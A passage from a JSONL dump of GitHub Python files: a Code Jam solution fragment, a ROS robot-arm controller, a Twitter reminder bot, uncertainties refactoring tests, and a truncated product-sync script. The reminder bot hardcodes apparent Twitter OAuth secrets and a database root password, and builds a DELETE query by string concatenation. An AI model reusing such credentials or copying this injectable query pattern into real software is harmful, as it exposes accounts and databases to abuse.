horses.append([K, S])\n \n horses.sort(key=lambda x: x[0], reverse = True)\n \n for i in range(1, N):\n speed = horses[i-1][1] * 1.0\n position = horses[i-1][0] * 1.0\n time = (D - position)/speed\n \n speed2 = horses[i][1] * 1.0\n position2 = horses[i][0] * 1.0\n time2 = (D - position2)/speed2\n \n if time2 < time:\n newSpeed = (D - position2) / time\n horses[i][1] = newSpeed\n \n speed = horses[N-1][1] * 1.0\n position = horses[N-1][0] * 1.0\n time = (D - position)/speed\n \n finalSpeed = D / time\n res = \"{0:.8f}\".format(finalSpeed)\n \n print(\"Case #{}: {}\".format(t+1, res))\n output.write(\"Case #{}: {}\".format(t+1, res))\n output.write(\"\\n\")\n \noutput.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_206/1201.py","file_name":"1201.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11704191531","text":"#!/usr/bin/python3\n\nimport sys\nimport os\nimport math\nimport rospy\nimport tf\n\nfrom PyKDL import ( # pylint: disable=no-name-in-module\n Chain,\n Frame,\n Vector,\n Rotation,\n Segment,\n JntArray,\n Joint,\n ChainFkSolverPos_recursive,\n ChainIkSolverVel_pinv,\n ChainIkSolverPos_NR,\n)\n\n# from time import sleep\nfrom std_msgs.msg import Bool, String, Float32MultiArray\nfrom sensor_msgs.msg import JointState\nfrom actionlib_msgs.msg import GoalStatusArray\nfrom tf2_msgs.msg import TFMessage\n\n\n################ joint test list ####################\n\n# examples of teaching points\nq = [0, 0, 0, 0, 0, 0]\nhome = [0, 0, -90, 0, -90, 0]\nway_home = [8, -17, -86, 0, -77, 7]\np1_up = [10, -32, -88, 0, -60, 10]\np1_down = [10, -36, -92, 0, -52, 10]\np2_up = [0, -37, -76, 0, -67, 0]\np2_down = [0, -42, -82, 0, -57, 0]\np3_up = [2, -50, -53, 0, -78, 2]\np3_down = [2, -53, -58, 0, -70, 2]\np4_up = [11, -45, -63, 0, -73, 11]\np4_down = [11, -48, -68, 0, -65, 11]\nway_home2 = [11, -24, -82, -1, -74, 11]\n# chain_test = [0, 90, 0, 0, -90, 0]\n\nway_point = [\n home,\n way_home,\n p1_up,\n p1_down,\n p1_up,\n p2_up,\n p2_down,\n p2_up,\n p3_up,\n p3_down,\n p3_up,\n p4_up,\n p4_down,\n p4_up,\n way_home,\n home,\n]\n\n################ joint test list end ################\n\n\ndef rads2degs(rad_list):\n degs = [math.degrees(rad) for rad in rad_list]\n return degs\n\n\ndef degs2rads(deg_list):\n rads = [math.radians(deg) for deg in deg_list]\n return rads\n\n\nclass TaskControllerApp:\n \"\"\"Joint Controller\n\n Args:\n self.isstatus : check robot status\n self.listener : get tf(robot) info /link0 to /link6\n self.isshutdown : program termination param\n\n self.chain : define robot link(chain) from tf listener -> to calc kinematics(fk/ik)\n self.jointAngles : get current joint value of robot\n\n self.trans : vector value to build chain\n self.rot : ratation value to build chain\n\n \"\"\"\n\n def __init__(self):\n rospy.init_node(\"task_controller_indy\")\n\n self.ready = 0\n self.READY_STATE = 101\n self.BUSY_STATE = 202\n self.MOVING = 303\n self.ERROR = 404\n\n # publisher\n self.stop_pub = rospy.Publisher(\"/stop_motion\", Bool, queue_size=1)\n self.jnt_pub = rospy.Publisher(\"joint_val\", Float32MultiArray, queue_size=1)\n self.node_shutdown_pub = rospy.Publisher(\"/shutdown_msg\", Bool, queue_size=1)\n\n # subscriber\n self.indy_status_check_sub = rospy.Subscriber(\n \"/indy/status\", GoalStatusArray, self.status_callback\n )\n self.indy_joint_sub = rospy.Subscriber(\n \"/joint_states\", JointState, self.joint_callback\n )\n self.cmd_msg_sub = rospy.Subscriber(\"/cmd_msg\", String, self.msg_callback)\n # self.frame_sub = rospy.Subscriber(\"/way_point_msg\", Frame, self.get_point_cb)\n\n self.isstatus = GoalStatusArray()\n self.robot_tf = TFMessage()\n self.listener = tf.TransformListener()\n self.indy_jnt = JointState()\n self.isshutdown = False\n\n self.chain = Chain()\n self.jointAngles = JntArray(6)\n self.q_list = Float32MultiArray()\n\n self.q_list.data = [0 for l in range(6)]\n self.trans = [0 for i in range(6)]\n self.rot = [0 for j in range(6)]\n\n self.go_sign = \"1\"\n\n while True:\n try:\n (self.trans[0], self.rot[0]) = self.listener.lookupTransform(\n \"/link1\", \"/link2\", rospy.Time(0)\n )\n (self.trans[1], self.rot[1]) = self.listener.lookupTransform(\n \"/link2\", \"/link3\", rospy.Time(0)\n )\n (self.trans[2], self.rot[2]) = self.listener.lookupTransform(\n \"/link3\", \"/link4\", rospy.Time(0)\n )\n (self.trans[3], self.rot[3]) = self.listener.lookupTransform(\n \"/link4\", \"/link5\", rospy.Time(0)\n )\n (self.trans[4], self.rot[4]) = self.listener.lookupTransform(\n \"/link5\", \"/link6\", rospy.Time(0)\n )\n (self.trans[5], self.rot[5]) = self.listener.lookupTransform(\n \"/link6\", \"/tcp\", rospy.Time(0)\n )\n break\n\n except (\n tf.LookupException,\n tf.ConnectivityException,\n tf.ExtrapolationException,\n ):\n continue\n\n # Build chain link1 to tcp\n self.chain.addSegment(\n Segment(\n Joint(Joint.RotZ),\n Frame(\n Rotation.Quaternion(0.5, 0.5, -0.5, 0.5),\n Vector(self.trans[0][0], self.trans[0][1], self.trans[0][2]),\n ),\n )\n )\n self.chain.addSegment(\n Segment(\n Joint(Joint.RotZ),\n Frame(\n Rotation.Quaternion(0, 0, 0, 1),\n Vector(self.trans[1][0], self.trans[1][1], self.trans[1][2]),\n ),\n )\n )\n self.chain.addSegment(\n Segment(\n Joint(Joint.RotZ),\n Frame(\n Rotation.Quaternion(-0.5, -0.5, 0.5, 0.5),\n Vector(self.trans[2][0], self.trans[2][1], self.trans[2][2]),\n ),\n )\n )\n self.chain.addSegment(\n Segment(\n Joint(Joint.RotZ),\n Frame(\n Rotation.Quaternion(0.5, 0.5, -0.5, 0.5),\n Vector(self.trans[3][0], self.trans[3][1], self.trans[3][2]),\n ),\n )\n )\n self.chain.addSegment(\n Segment(\n Joint(Joint.RotZ),\n Frame(\n Rotation.Quaternion(-0.5, -0.5, 0.5, 0.5),\n Vector(self.trans[4][0], self.trans[4][1], self.trans[4][2]),\n ),\n )\n )\n self.chain.addSegment(\n Segment(\n Joint(Joint.RotZ),\n Frame(\n Rotation.Quaternion(0, 0, 0, 1),\n Vector(self.trans[5][0], self.trans[5][1], self.trans[5][2]),\n ),\n )\n )\n\n ######## solver to calc kinematics(fk/ik) ##################\n # self.fksolverpos = ChainFkSolverPos_recursive(self.chain)\n # self.iksolver1v = ChainIkSolverVel_pinv(self.chain)\n # self.iksolverpos = ChainIkSolverPos_NR(self.chain, self.fksolverpos, self.iksolver1v)\n\n ############## Solver ref###################################\n # self.jacsolver = ChainJntToJacSolver(self.chain)\n # self.jacdotsolver = ChainJntToJacDotSolver(self.chain)\n # self.fksolverpos = ChainFkSolverPos_recursive(self.chain)\n # self.fksolvervel = ChainFkSolverVel_recursive(self.chain)\n # self.iksolvervel = ChainIkSolverVel_pinv(self.chain)\n # self.iksolvervel_givens = ChainIkSolverVel_pinv_givens(self.chain)\n # self.iksolverpos = ChainIkSolverPos_NR(self.chain, self.fksolverpos, self.iksolvervel)\n # self.iksolverpos_givens = ChainIkSolverPos_NR(self.chain, self.fksolverpos, self.iksolvervel_givens)\n\n def move_seq(self):\n\n ROBOT = self.READY_STATE\n ROBOT = self.isReadyState(ROBOT)\n q_jnt = JntArray(self.chain.getNrOfJoints())\n\n job_check = True\n job_count = 0\n\n while job_check:\n\n if ROBOT == self.READY_STATE:\n q = way_point[job_count]\n q = degs2rads(q)\n\n for l, k in enumerate(q):\n q_jnt[l] = k\n\n for j in range(6):\n self.q_list.data[j] = q_jnt[j]\n\n print(self.q_list)\n self.jnt_pub.publish(self.q_list)\n\n ROBOT = self.MOVING\n job_count += 1\n\n ROBOT = self.isReadyState(ROBOT)\n\n if ROBOT == self.ERROR:\n print(\"Error!\")\n break\n\n if job_count > 15:\n # input_sig = True\n job_count = 0\n job_check = False\n\n if self.isshutdown:\n job_check = False\n\n def move_sig(self, sig):\n \"\"\"\n keyboard input guide\n\n w r\n a d\n x f\n\n\n Args :\n jointAngles : current joint values\n current_frame : current Frame value calculated fk using current joint angle value\n goal_frame : goal Frame\n q_jnt : goal joint angle value calculated ik using goal frame\n \"\"\"\n\n ROBOT = self.READY_STATE\n ROBOT = self.isReadyState(ROBOT)\n goal_frame = Frame()\n current_frame = Frame()\n q_jnt = JntArray(self.chain.getNrOfJoints())\n\n self.fksolverpos = ChainFkSolverPos_recursive(self.chain)\n self.iksolver1v = ChainIkSolverVel_pinv(self.chain)\n self.iksolverpos = ChainIkSolverPos_NR(\n self.chain, self.fksolverpos, self.iksolver1v\n )\n\n self.fksolverpos.JntToCart(self.jointAngles, current_frame)\n\n tmp_ROT = Rotation.GetRPY(current_frame.M)\n\n ######## print for check #########\n\n print(\" \")\n print(\"current joint angle\")\n print(self.jointAngles)\n print(\"current frame\")\n print(current_frame)\n print(\"#####################\")\n\n ######## print for check end #####\n\n if sig == \"0\":\n q = [0, 0, 0, 0, 0, 0]\n q = degs2rads(q)\n\n for l, k in enumerate(q):\n q_jnt[l] = k\n\n ######################## VECTOR #########################\n # 0.1 => 0.1m\n # vector x + 0.1\n elif sig == \"w\":\n goal_frame = Frame(\n current_frame.M,\n Vector(\n current_frame.p[0] + 0.1, current_frame.p[1], current_frame.p[2]\n ),\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n # vector x - 0.1\n elif sig == \"x\":\n goal_frame = Frame(\n current_frame.M,\n Vector(\n current_frame.p[0] - 0.1, current_frame.p[1], current_frame.p[2]\n ),\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n # vector y + 0.1\n elif sig == \"a\":\n goal_frame = Frame(\n current_frame.M,\n Vector(\n current_frame.p[0], current_frame.p[1] + 0.1, current_frame.p[2]\n ),\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n # vector y - 0.1\n elif sig == \"d\":\n goal_frame = Frame(\n current_frame.M,\n Vector(\n current_frame.p[0], current_frame.p[1] - 0.1, current_frame.p[2]\n ),\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n # vector z + 0.1\n elif sig == \"r\":\n goal_frame = Frame(\n current_frame.M,\n Vector(\n current_frame.p[0], current_frame.p[1], current_frame.p[2] + 0.1\n ),\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n # vector z - 0.1\n elif sig == \"f\":\n goal_frame = Frame(\n current_frame.M,\n Vector(\n current_frame.p[0], current_frame.p[1], current_frame.p[2] - 0.1\n ),\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n tmp_ROT = Rotation.GetRPY(current_frame.M)\n ######################## VECTOR end #####################\n\n ######################## ROTATION #######################\n # 0.1 => 17 deg\n elif sig == \"y\":\n goal_frame = Frame(\n Rotation.RPY(tmp_ROT[0] + 0.1, tmp_ROT[1], tmp_ROT[2]), current_frame.p\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n elif sig == \"u\":\n goal_frame = Frame(\n Rotation.RPY(tmp_ROT[0] - 0.1, tmp_ROT[1], tmp_ROT[2]), current_frame.p\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n elif sig == \"g\":\n goal_frame = Frame(\n Rotation.RPY(tmp_ROT[0], tmp_ROT[1] + 0.1, tmp_ROT[2]), current_frame.p\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n elif sig == \"h\":\n goal_frame = Frame(\n Rotation.RPY(tmp_ROT[0], tmp_ROT[1] - 0.1, tmp_ROT[2]), current_frame.p\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n elif sig == \"b\":\n goal_frame = Frame(\n Rotation.RPY(tmp_ROT[0], tmp_ROT[1], tmp_ROT[2] + 0.1), current_frame.p\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n elif sig == \"n\":\n goal_frame = Frame(\n Rotation.RPY(tmp_ROT[0], tmp_ROT[1], tmp_ROT[2] - 0.1), current_frame.p\n )\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n ######################## ROTATION end ###################\n\n ########## test #########################################\n\n elif sig == \"j\":\n goal_frame = Frame(current_frame.M, Vector(0.3, 0.3, 0.5))\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n elif sig == \"k\":\n goal_frame = Frame(current_frame.M, Vector(0.3, -0.3, 0.5))\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n elif sig == \"l\":\n goal_frame = Frame(current_frame.M, Vector(0.13, 0.756, 0.568))\n self.iksolverpos.CartToJnt(self.jointAngles, goal_frame, q_jnt)\n\n ########## test end #####################################\n\n else:\n _input = int(self.go_sign) - 1\n\n if _input > 15:\n print(\"input ERROR! please enter num again(1~16)\")\n else:\n q = way_point[_input]\n q = degs2rads(q)\n\n for l, k in enumerate(q):\n q_jnt[l] = k\n\n for j in range(6):\n tmp_q = q_jnt[j] // math.pi\n tmp_r = q_jnt[j] % math.pi\n\n if tmp_q % 2:\n self.q_list.data[j] = tmp_r - math.pi\n\n else:\n self.q_list.data[j] = tmp_r\n\n self.jnt_pub.publish(self.q_list)\n\n # if ROBOT == self.READY_STATE:\n # print(self.q_list)\n # self.jnt_pub.publish(self.q_list)\n\n ######## print for check #########\n\n print(\"goal joint angle\")\n print(self.q_list.data)\n print(\"goal frame\")\n print(goal_frame)\n print(\"#####################\")\n\n # print(\"ROT\")\n # # print(current_frame.M.GetQuaternion())\n # print(current_frame.M.GetRPY())\n # print(\"Vector\")\n # print(current_frame.p)\n\n ######## print for check end ######\n\n # Subscriber callback funcs\n def status_callback(self, data):\n self.isstatus = data\n # print(self.isstatus.status_list[0].status, end=' : ')\n # print(self.isstatus.status_list[0].text)\n self.ready = self.isstatus.status_list[0].status\n\n # current joint value(rad)\n def joint_callback(self, jnt):\n for i in range(6):\n self.jointAngles[i] = jnt.position[i]\n\n # get user command\n def msg_callback(self, cmd_msg):\n self.go_sign = cmd_msg.data\n\n if self.go_sign == \"p\":\n self.move_seq()\n elif self.go_sign == \"s\":\n self.stop_pub.publish(True)\n elif self.go_sign == \"q\":\n self.isshutdown = True\n self.node_shutdown_pub.publish(True)\n else:\n self.move_sig(self.go_sign)\n\n # get goal point frame and pub goal joint values\n def get_point_cb(self, fr_data):\n q_jnt = JntArray(self.chain.getNrOfJoints())\n self.iksolverpos.CartToJnt(self.jointAngles, fr_data, q_jnt)\n self.jnt_pub.publish(q_jnt)\n\n def stop(self):\n self.stop_pub.publish(True)\n\n # Robot status func\n def isReadyState(self, ROBOT):\n \"\"\"ROBOT status check and convert\n\n Args:\n self.ready : current robot status (1:ready, 2:busy, 3:direct teaching)\n self.READY_STATE : when robot can get joint value and move\n self.BUSY_STATE : when robot moving\n self.MOVING : when controller give joint value to robot\n self.ERROR : occurs error\n\n Returns:\n robot state (compared with previous state)\n\n Raises:\n RobotError: If robot status is error status.\n \"\"\"\n\n # ROBOT start moving\n if ROBOT == self.MOVING:\n if self.ready == 0:\n return ROBOT\n elif self.ready == 1:\n ROBOT = self.BUSY_STATE\n return ROBOT\n else:\n print(\"CAN NOT MOVING!\")\n return self.ERROR\n\n # ROBOT moving...\n elif ROBOT == self.BUSY_STATE:\n if self.ready == 1:\n return ROBOT\n elif self.ready == 0:\n ROBOT = self.READY_STATE\n return ROBOT\n else:\n print(\"CAN NOT MOVING!\")\n return self.ERROR\n\n else:\n ROBOT = self.READY_STATE\n return ROBOT\n\n\ndef main():\n\n app = TaskControllerApp()\n\n while not rospy.is_shutdown():\n if app.isshutdown:\n break\n\n # rospy.spin()\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"1Gyu1/ros-noetic","sub_path":"ros-noetic-pkgs/controll_robots/scripts/examples/indy/indy_task_controller.py","file_name":"indy_task_controller.py","file_ext":"py","file_size_in_byte":17939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20447939750","text":"\"\"\"\n@author Barnabas Vizy\nInserts a tweet_obj into the MySQL database.\nTo config the database:\n > CREATE TABLE reminders(\n -> sender varchar(15) NOT NULL,\n -> hour INT NOT NULL,\n -> minute INT NOT NULL,\n -> period varchar(4) NOT NULL,\n -> time_zone varchar(20) NOT NULL,\n -> month tinyint NOT NULL,\n -> day tinyint NOT NULL,\n -> msg varchar(123) NOT NULL,\n -> following bit NOT NULL);\n\"\"\"\n\nimport pymysql\nfrom twitter import Twitter, OAuth\nfrom datetime import *\nimport time\nfrom error import update_log\nfrom random import randint\n\n\nauth = OAuth(\n consumer_key='2CE1E6U7odFK1MFWeCnOPIh5R',\n consumer_secret='SqqWIvcMGdLbwAqu2oSBzsCr4379aSITLy4AsA9HZyPQxYqCl6',\n token='796842527487889409-hY298XB4dZGxBLU2blhpCVMz14UPQo8',\n token_secret='E9CmwGNpDNffxzU7NjuXernjofYSEF6RyjEKiVantXJap'\n)\n# auth = OAuth( # keys for reminderbot002@gmail.com , secondary test account with same login\n# consumer_key='PfV0xdYWs55kstAO4PHF1kIHt',\n# consumer_secret='wYtyvj7EaHBWftLCR8sfYBJKQISu4PhhWszIuLACo0I4jqBgAi',\n# token='792039779068157952-HxKthF9JlcGtDYEiHfT1bn456tJKNLE',\n# token_secret='Fl24QTmnau3vQB3svxDBnepwTL4ifGHvLJVD52PXKXh99'\n# )\n\nt = Twitter(auth=auth)\n\nwhile (1<2):\n conn = pymysql.connect(host='localhost', user='root', passwd='thisisthepassword', db='thereminderbot')\n cursor = conn.cursor()\n # query for selecting ALL table records\n query = (\"SELECT SENDER, HOUR, MINUTE, PERIOD, TIME_ZONE, MONTH, DAY, MSG, FOLLOWING FROM reminders \")\n # cursor is now full table\n cursor.execute(query)\n print(\"Checking DB...\")\n # for every element in table, do any of the times match\n # if they do, send tweet to user with message\n for (SENDER, HOUR, MINUTE, PERIOD, TIME_ZONE, MONTH, DAY, MSG, FOLLOWING) in cursor:\n\n tweet_string = \"Hey @\" + SENDER + \" - \" + MSG + \" - \" + str(randint(1000, 9999))\n timeEST = datetime.now()\n\n militarytimefix = 0\n if(PERIOD == \"PM\"):\n militarytimefix = 12\n\n newtime = timeEST.hour-militarytimefix\n if newtime < 0 :\n newtime = timeEST.hour\n\n current_time = datetime(timeEST.year, timeEST.month, timeEST.day, newtime, timeEST.minute, 0)\n #print(\"HOUR:\"+str(HOUR)+\", MIN: \"+str(MINUTE)+\", MONTH:\"+str(MONTH)+\", DAY: \"+str(DAY)+\", \"+str(current_time))\n if MONTH == timeEST.month and DAY == current_time.day and HOUR == current_time.hour and MINUTE == timeEST.minute:\n print(\"SENDER: {0}, HOUR: {1}, MINUTE: {2}, PERIOD: {3}, TIME_ZONE: {4}, MONTH: {5}, DAY: {6}, MSG: {7}, FOLLOWING: {8}\".format(SENDER, HOUR, MINUTE, PERIOD, TIME_ZONE, MONTH, DAY, MSG, FOLLOWING))\n #use twitter connection to send reminder\n t.statuses.update(status=str(tweet_string))\n update_log(SENDER, \"Reminder completed\")\n #remove all reminders by user after successful expiration of most recent reminder\n cursor.execute(\"DELETE FROM reminders WHERE sender = '\"+SENDER+\"'\")\n #commiting changes to db is absolutely essential\n conn.commit()\n time.sleep(1.0) #wait a second so we don't send out a million tweets at once\n continue\n\n time.sleep(60.0)\n conn.close()\n cursor.close()","repo_name":"botronico/the-reminder-bot","sub_path":"thereminderbot/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27984943083","text":"#!/usr/bin/env python\n\n'''\nUnit tests for the uncertainties.lib1to2 code update package.\n\nMeant to be run through nosetests.\n\n(c) 2013-2020 by Eric O. LEBIGOT (EOL).\n'''\n\n# Code inspired by:\n#\n# - lib2to3.tests.test_fixers.py\n\nfrom builtins import str\nimport sys\nimport os\n\n# !! Would it be possible to use an import hook so as to stop the\n# import if the Python version is not high enough, instead of having\n# like here a whole indented block?\n\n\nif sys.version_info < (2, 7) or \"TRAVIS\" in os.environ or \"APPVEYOR\" in os.environ:\n \n # This package uses lib2to3, which requires Python 2.6+.\n \n # lib2to3.tests.support is missing from 2.7.3 Travis Python packages.\n\n # !! Nosetests for Python 2.6 also fails (it looks like it tries\n # to run tests via lib2to3/tests/test_refactor.py):\n \n pass\n\nelse:\n\n import os\n try:\n # lib2to3 test support seems to have moved to a new place in 2013:\n import test.test_lib2to3.support as support\n except ImportError:\n # Pre-~2013 path for lib2to3 test support\n import lib2to3.tests.support as support\n\n # The lib1to2.fixes package given to lib2to3 is the *local* package\n # (not to another installed module). This is important for the\n # __import__() used via support.get_refactorer().\n sys.path.insert(0, os.path.join(os.path.dirname(__file__), os.pardir))\n\n def check_refactor(refactorer, source, expected):\n \"\"\"\n Raises an AssertionError if the given\n lib2to3.refactor.RefactoringTool does not refactor 'source' into\n 'expected'.\n\n source, expected -- strings (typically with Python code).\n \"\"\"\n\n # !! str() is from future's builtins and is only needed for Python 2,\n # where it is mostly equivalent to unicode():\n new = str(\n refactorer.refactor_string(support.reformat(source), ''))\n\n assert support.reformat(expected) == new, (\n \"Refactoring failed: '{}' => '{}' instead of '{}'\".format(\n source, new.strip(), expected))\n\n # print 'Checked:', source, '=>', expected\n \n def check_all(fixer, tests):\n '''\n Takes a fixer name (module from fixes) and a mapping that maps\n code using the obsolete syntax into updated code, and checks\n whether the code is correctly updated.\n ''' \n\n refactorer = support.get_refactorer(\n fixer_pkg='lib1to2', fixers=[fixer])\n\n for (input_str, out_str) in tests.items():\n check_refactor(refactorer, input_str, out_str)\n\n def test_fix_std_dev():\n 'Tests the transformation of std_dev() into std_dev.'\n\n\n tests = {\n 'x.std_dev()': 'x.std_dev',\n 'y.std_dev(); unc.std_dev(z)': 'y.std_dev; unc.std_dev(z)',\n 'uncertainties.std_dev(x)': 'uncertainties.std_dev(x)',\n 'std_dev(x)': 'std_dev(x)',\n 'obj.x.std_dev()': 'obj.x.std_dev',\n\n \"\"\"\n long_name.std_dev(\n # No argument!\n )\"\"\":\n \"\"\"\n long_name.std_dev\"\"\",\n\n # set_std_dev => .std_dev:\n 'x.set_std_dev(3)': 'x.std_dev = 3',\n 'y = set_std_dev(3)': 'y = set_std_dev(3)', # None\n 'func = x.set_std_dev': 'func = x.set_std_dev',\n 'obj.x.set_std_dev(sin(y))': 'obj.x.std_dev = sin(y)'\n }\n\n check_all('std_dev', tests)\n\n def test_ufloat():\n '''\n Test of the transformation of ufloat(tuple,...) and\n ufloat(string,...) into ufloat(nominal_value, std_dev, tag=...).\n '''\n\n tests = {\n # Tuples:\n 'ufloat((3, 0.14))': 'ufloat(3, 0.14)',\n 'ufloat((3, 0.14), \"pi\")': 'ufloat(3, 0.14, \"pi\")',\n \"ufloat((3, 0.14), 'pi')\": \"ufloat(3, 0.14, 'pi')\",\n \"x = ufloat((3, 0.14), tag='pi')\": \"x = ufloat(3, 0.14, tag='pi')\",\n\n # Simple expressions that can be transformed:\n 'ufloat((n, s), tag=\"var\")': 'ufloat(n, s, tag=\"var\")',\n\n # Simple expressions that cannot be transformed automatically:\n 'ufloat(str_repr, tag=\"var\")': 'ufloat(str_repr, tag=\"var\")',\n 'ufloat(*tuple_repr, tag=\"var\")': 'ufloat(*tuple_repr, tag=\"var\")',\n 'ufloat(*t[0, 0])': 'ufloat(*t[0, 0])', \n\n # Strings:\n 'ufloat(\"-1.23(3.4)\")': 'ufloat_fromstr(\"-1.23(3.4)\")',\n \"ufloat('-1.23(3.4)')\": \"ufloat_fromstr('-1.23(3.4)')\",\n 'ufloat(\"-1.23(3.4)\", \"var\")':\n 'ufloat_fromstr(\"-1.23(3.4)\", \"var\")',\n 'ufloat(\"-1.23(3.4)\", tag=\"var\")':\n 'ufloat_fromstr(\"-1.23(3.4)\", tag=\"var\")'\n\n }\n\n # Automatic addition of a dotted access:\n tests.update(dict(\n # !! Dictionary comprehension usable with Python 2.7+\n (orig.replace('ufloat', 'unc.ufloat'),\n new.replace('ufloat', 'unc.ufloat'))\n for (orig, new) in tests.items()))\n\n # Test for space consistency:\n tests[' t = u.ufloat(\"3\")'] = ' t = u.ufloat_fromstr(\"3\")'\n\n # Exponentiation test:\n tests.update(dict(\n # !! Dictionary comprehension usable with Python 2.7+\n (orig+'**2', new+'**2')\n for (orig, new) in tests.items()))\n\n # Exponent test:\n tests['2**ufloat(\"3\")'] = '2**ufloat_fromstr(\"3\")'\n\n # Opposite test:\n tests['-ufloat(\"3\")'] = '-ufloat_fromstr(\"3\")'\n\n check_all('ufloat', tests)\n\n def test_uarray_umatrix():\n '''\n Test of the transformation of uarray(tuple,...) into\n uarray(nominal_values, std_devs). Also performs the same tests\n on umatrix().\n '''\n \n tests = {\n 'uarray((arange(3), std_devs))': 'uarray(arange(3), std_devs)',\n 'uarray(tuple_arg)': 'uarray(*tuple_arg)',\n # Unmodified, correct code:\n 'uarray(values, std_devs)': 'uarray(values, std_devs)',\n # Spaces tests:\n 'uarray( ( arange(3), std_devs ) ) ':\n 'uarray( arange(3), std_devs) ',\n 'uarray( tuple_arg )': 'uarray(* tuple_arg)'\n\n }\n\n # Automatic addition of a dotted access:\n tests.update(dict(\n # !! Dictionary comprehension usable with Python 2.7+\n (orig.replace('uarray', 'un.uarray'),\n new.replace('uarray', 'un.uarray'))\n for (orig, new) in tests.items()))\n \n # Exponentiation test:\n tests.update(dict(\n # !! Dictionary comprehension usable with Python 2.7+\n (orig+'**2', new+'**2')\n for (orig, new) in tests.items()))\n\n # Test for space consistency:\n tests[' t = u.uarray(args)'] = ' t = u.uarray(*args)'\n\n # Same tests, but for umatrix:\n tests.update(dict(\n (orig.replace('uarray', 'umatrix'),\n new.replace('uarray', 'umatrix'))\n for (orig, new) in tests.items()))\n \n check_all('uarray_umatrix', tests)\n\n","repo_name":"lebigot/uncertainties","sub_path":"uncertainties/lib1to2/test_1to2.py","file_name":"test_1to2.py","file_ext":"py","file_size_in_byte":7058,"program_lang":"python","lang":"en","doc_type":"code","stars":489,"dataset":"github-code","pt":"61"} +{"seq_id":"13441875040","text":"import requests\nimport json\nimport pymysql\n#import datetime\nfrom datetime import datetime\nfrom datetime import timedelta, date\n\ndef getColumnNames(tableName):\n\n # MySQL Server credentials\n db = pymysql.connect(\"0.0.0.0\",\"user\",\"xxx\",\"Invoices\")\n cursor = db.cursor()\n\n lQuery = \"describe {0};\".format(tableName)\n\n rowsCount=cursor.execute(lQuery)\n\n returnData = []\n for data in cursor.fetchall():\n if (data[0]!='aplicaPrecioUnico' and data[0]!='precioUnico'):\n returnData.append(data[0])\n\n db.close()\n\n #print(returnData)\n\n return returnData\n\ndef obtenerIdLocal(idGlobal):\n\n # MySQL Server credentials\n db = pymysql.connect(\"0.0.0.0\",\"user\",\"xxx\",\"Invoices\")\n cursor = db.cursor()\n\n lQuery = \"select idLocal from catArticulosNube where idNube = {0}\".format(idGlobal)\n\n #print(lQuery)\n\n rowsCount=cursor.execute(lQuery)\n\n returnData = []\n for data in cursor.fetchall():\n returnData.append(data[0])\n\n db.close()\n\n #print(returnData)\n\n return returnData\n\n\ndef actualizarRegistro(querySQL, params):\n\n # MySQL Server credentials\n db = pymysql.connect(\"0.0.0.0\",\"user\",\"xxx\",\"Invoices\" )\n cursor = db.cursor()\n\n rowsCount=cursor.execute(querySQL, params)\n\n db.commit()\n db.close()\n\n print(\"Registros actualizados {0}\".format(rowsCount))\n\n return rowsCount\n\ndef insertarRegistro(sentenciaSQL, params):\n\n # MySQL Server credentials\n db = pymysql.connect(\"0.0.0.0\",\"user\",\"xxx\",\"Invoices\" )\n cursor = db.cursor()\n\n rowsCount=cursor.execute(sentenciaSQL, params)\n\n idInserted=cursor.lastrowid\n\n db.commit()\n db.close()\n\n return idInserted\n\n\n#mysql> describe catArticulosNube;\n#+-----------------+----------+------+-----+---------+-------+\n#| Field | Type | Null | Key | Default | Extra |\n#+-----------------+----------+------+-----+---------+-------+\n#| idNube | int(11) | NO | PRI | NULL | |\n#| idLocal | int(11) | NO | PRI | NULL | |\n#| dtFechaAct | datetime | NO | | NULL | |\n#| dtFechaDownload | datetime | NO | | NULL | |\n#+-----------------+----------+------+-----+---------+-------+\n#4 rows in set (0.00 sec)\n\nif __name__ == '__main__':\n\n with open('prodConf.json') as json_file:\n confProd = json.load(json_file)\n\n idTienda=confProd[\"idTienda\"]\n\n x = datetime.now()\n nombreLog = \"./{0}_{1}_{2}_{3}_{4}_{5}.log\".format(x.strftime(\"%Y\"), x.strftime(\"%m\"), x.strftime(\"%d\"), x.strftime(\"%H\"), x.strftime(\"%M\"), x.strftime(\"%S\"))\n \n print(nombreLog)\n fp = open(nombreLog, 'w')\n\n colNames = getColumnNames('catProductos')\n\n r = requests.get('http://45.55.248.209:5002/productos/{0}'.format(idTienda))\n jsonResponse = r.json()\n\n totalReg=0\n wentOK = True\n dtRegModificado = datetime.strptime(\"2021-01-01 00:00:00\", '%Y-%m-%d %H:%M:%S')\n for producto in jsonResponse:\n totalReg = totalReg + 1\n primero = True\n updateSQL = \"update catProductos SET \";\n insertSQL = \"insert into catProductos(\"\n insertVSQL = \" values(\"\n prodData = []\n\n if datetime.strptime(producto[\"dtRegModificado\"], '%Y-%m-%d %H:%M:%S') > dtRegModificado:\n dtRegModificado = datetime.strptime(producto[\"dtRegModificado\"], 